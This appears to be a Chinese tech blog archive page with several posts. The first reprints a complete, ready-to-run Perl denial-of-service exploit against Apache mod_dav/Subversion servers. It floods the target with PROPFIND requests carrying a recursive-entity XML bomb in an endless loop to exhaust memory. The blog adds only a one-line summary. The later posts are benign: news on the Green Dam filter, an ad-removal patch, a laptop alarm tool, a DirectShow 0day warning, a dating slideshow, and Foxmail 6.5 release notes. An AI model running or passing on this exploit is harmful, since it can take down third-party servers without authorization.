Apache mod_dav / svn远程拒绝服务漏洞

利用此漏洞会耗尽系统所有内存资源。

###furoffyourcat.pl
### Apache mod_dav / svn Remote Denial of Service Exploit
### by kcope / June 2009
###
### Will exhaust all system memory
### Needs Authentication on normal DAV
###
### This can be especially serious stuff when used against
### svn (subversion) servers!! Svn might let the PROPFIND slip through
### without authentication. bwhahaaha :o)
### use at your own risk!
##################################################################

use IO::Socket;
use MIME::Base64;

sub usage {
    print "Apache mod_dav / svn Remote Denial of Service Exploit\n";
    print "by kcope in 2009\n";
    print "usage: perl furoffyourcat.pl <remotehost> <webdav folder> [username] [password]\n";
    print "example: perl furoffyourcat.pl svn.XXX.com /projects/\n";exit;
}

if ($#ARGV < 1) {usage();}

$hostname = $ARGV[0];
$webdavfile = $ARGV[1];

$username = $ARGV[2];
$password = $ARGV[3];
                            
$|=1;

$BasicAuth = encode_base64("$username:$password");
chomp $BasicAuth;

my $sock = IO::Socket::INET->new(PeerAddr => $hostname,
                              PeerPort => 80,
                              Proto    => 'tcp');
print $sock "PROPFIND $webdavfile HTTP/1.1\r\n";
print $sock "Host: $hostname\r\n";
print $sock "Depth: 0\r\n";
print $sock "Connection: close\r\n";
if ($username ne "") {
print $sock "Authorization: Basic $BasicAuth\r\n";    
}
print $sock "\r\n";
$x = <$sock>;    

print $x;
if (!($x =~ /207/)) {
while(<$sock>) {
    print;    
}
close($sock);
print "No PROPFIND on this server and path.\n";
exit(0);    
}

$a = "";
for ($i=1;$i<256;$i++) {        # Here you can increase the XML bomb count
    $k = $i-1;
    $a .= "<!ENTITY x$i \"&x$k;&x$k;\">\n"
}

$igzml =
"<?xml version=\"1.0\"?>\n"
."<!DOCTYPE REMOTE [\n"
."<!ELEMENT REMOTE ANY>\n"
."<!ENTITY x0 \"foobar\">\n"
.$a
."]>\n"
."<REMOTE>\n"
."&x$k;\n"
."</REMOTE>\n";

print "Apache mod_dav / svn Remote Denial of Service Exploit\n";
print "by kcope in 2009\n";
print "Launching DoS Attack…\n";

$ExploitRequest =
"PROPFIND $webdavfile HTTP/1.1\r\n"
."Host: $hostname\r\n"
."Depth: 0\r\n";

if ($username ne "") {
$ExploitRequest .= "Authorization: Basic $BasicAuth\r\n";    
}
$ExploitRequest .= "Content-Type: text/xml\r\nContent-Length: ".length($igzml)."\r\n\r\n" . $igzml;

while(1) {
again:
my $sock = IO::Socket::INET->new(PeerAddr => $hostname,
                              PeerPort => 80,
                              Proto    => 'tcp') || (goto again);

print $sock $ExploitRequest;
print ";Pp";
}

# milw0rm.com [2009-06-01]

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/180

下月起新售个人电脑将预装上网过滤软件(绿坝-花季护航)

      根据工信部的《关于计算机预装绿色上网过滤软件的通知》,7月1日以后,在我国境内生产销售的计算机出厂前将预装一款名为“绿坝-花季护航”的绿色上网过滤软件,而进口计算机在我国销售前也将预装该软件。

      这款软件具备拦截色情内容、过滤不良网站、控制上网时间、查看上网记录等功能,工信部等几部委使用中央财政资金买断其一年服务供全社会免费使用,此前几部委已要求全国各地中小学的联网计算机5月底要安装该软件,而所有进入“家电下乡”目录的计算机也已预装该软件。目前绿坝的装机总量已超过5000万套。

绿坝-花季护航 绿色上网过滤软件

      工信部在《关于计算机预装绿色上网过滤软件的通知》中指出,此举将有助于构建绿色、健康、和谐的网络环境,巩固整治互联网低俗之风专项行动成果。

      日前,国家工业和信息化部下发《关于计算机预装绿色上网过滤软件的通知》,要求7月1日之后在我国销售的所有个人电脑出厂时预装绿色上网过滤软件“绿坝-花季护航”(以下简称绿坝),并定期报告计算机销售数量和软件安装数量。

      通知要求,计算机生产及销售企业应于2009年6月底完成“绿坝-花季护航”软件预装测试等相关工作,2009年7月1日后出厂和销售的计算机应预装“绿坝-花季护航”软件,软件被要求预装在计算机硬盘或随机光盘内。

      通知同时还要求计算机生产者及软件提供者自2010年起每年2月底上报上一年度数据。

      来自工信部的统计信息显示,至今年3月底,已有国内约95家网站提供绿坝软件免费下载,下载次数共计约326.68万次;约2279所校园装备绿坝软件,总装机数达约51.83万台;约6957家网站完成绿坝软件安装工作,总装机数达约116.35万台。

      0point手记:有网友提出这是ZF变相监视网民行为,面对质疑,工信部出面澄清说此软件并非强制安装,而是选择安装。个人对此事件主要还是持赞成意见,过滤软件面对的主要对象应该是为未成年人购买电脑的家长、学校和一些公共网络服务场所。虽然现在已经有类似的免费过滤软件,但政府买单无偿提供无疑让家长和学校多了一种选择。

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/pc-tech/181

谷歌金山词霸去广告补丁下载

  谷歌金山词霸自更新至1.9版后,界面上出现了广告,一个闪动的横幅外加4个图标,而且在从托盘单击启动程序和鼠标取词的时候都会有严重的延时,应该是在这一段时间来加载flash广告。

  此补丁只适用于谷歌金山词霸,只能去除界面上的广告,对于软件内页面的广告无能为力。同时加入了词霸本身的修复功能,这个其实很有用处。在某些情况下,词霸取词不正常或者功能缺失的时候,重新注册一下控件,就可以很好的解决问题。

下载文件 点击下载谷歌金山词霸去广告补丁

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/pc-tech/182

笔记本防盗软件Laptop Alarm汉化特别版下载

      只要你的笔电被其他人挪动了(断开电源、关机、注销、移动拔出鼠标),它就会像防盗门或者超市防盗检测门那样发出非常大声的警报,就算你的电脑是静音的它也会发声,而且足够让你或者周围人听到。特别推荐在校学生使用。
      注意:这款只有200K左右的小软件只能运行于Windows系统。

笔记本防盗软件Laptop Alarm

下载文件 点击下载笔记本防盗软件Laptop Alarm汉化特别版

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/pc-tech/183

DirectShow 0day爆发警告

      来源:http://hi.baidu.com/80sec/blog/item/db7bb544ad956a2ecefca362.html
      DirectShow 0day是一个中率极高的0day漏洞,目前已经开始在网上爆发,其攻击形势不亚于去年的IE7 0day以及往年的ANI 0day。
      攻击特性如下:
      1.使用了.NET SHELLCODE技术,机器上装有.net framework就会中招。
      2.利用XP自带的Windows Media Player播放漏洞媒体文件触发。
      3.IE和FF 通杀,所谓的微软的killbit临时解决方案也无法防住。
      解决方案:
      目前微软没有补丁,360出了一个补丁
http://dl.360safe.com/360safefixavi.exe

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/184

网上盛传的女软件工程师征友PPT欣赏和下载

      网上盛传的ZTE中兴女软件工程师征友PPT,做的非常用心,有人说它是“年度最佳征婚征婚模板”也不为过;而且富于创意。相信并祝愿这位女工程师能找到很好的归宿!。
      先上几张截图:

中兴女软件工程师征友幻灯片截图1

中兴女软件工程师征友幻灯片截图2

中兴女软件工程师征友幻灯片截图3

中兴女软件工程师征友幻灯片截图4

中兴女软件工程师征友幻灯片截图5

中兴女软件工程师征友幻灯片截图6

。。。。
      从这些配图就足以看出作者的良苦用心,相信她对生活的态度也是一样。

      好了,看了几张截图,心动了吧?
下载文件 那就点击这里下载女软件工程师征友PPT

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/other/185

foxmail6.5正式版发布及试用

      Foxmail是我最喜欢的邮件客户端,不仅具有邮件收发功能,还能进行RSS订阅,使用非常方便。
      5.27,Foxmail发布了6.5正式版,对比Beta3做了以下更新:
      新增待办事项功能
      方便用户备忘、轻松管理各个事项,并可对重要事项设置提醒。
      新增明信片功能
      提供多种类型和风格的明信片,方便用户给亲朋好友致节日问候。
      新增换肤功能
      提供多种皮肤配色方案和底纹,并且支持用户自定义皮肤颜色。
      全面支持Hotmail邮箱
      不仅支持Hotmail的Pop3收取,而且还支持Hotmail的Web页面的文件夹管理。
      全文搜索更稳定、更准确
      全文搜索的索引建立速度大大提升,占用资源明显降低,搜索更稳定、更准确。
      优化若干体验,修改若干问题
      优化了Foxmail启动和关闭速度;
      单个本地邮件夹存储容量从2G扩展到4G;
      加强了Vista系统的数据兼容性;
      加强了Foxmail数据丢失的防御;
      优化了新建账号的自动设置功能;
      优化了打印功能;
      优化了保存大附件的速度;
      优化独立发送邮件功能;
      修改了个别邮件出现乱码的问题;
      修改了个别情况下邮件收取后出现邮件丢失的问题;
      修正了若干bug。
      其中的hotmail邮箱支持(POP3和http),邮件全文索引两项新功能意义非凡。Foxmail将是第一个在hotmail系统升级后支持hotmail邮箱的第三方邮件客户端软件,实际使用发现它的http收取邮件用的邮件服务器地址为http://mail.services.live.com/DeltaSync_v2.0.0/Sync.aspx,这应该是一个hotmail的http邮件同步地址。hotmail邮箱账户建立以后,它不能自动同步邮箱文件夹,而是需要手工新建同步文件夹,这是一个小小的不足。邮件内容索引更是将大大加快全文搜索速度,特别方便邮件众多的用户。
      点击这里下载Foxmail6.5正式版

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/pc-tech/186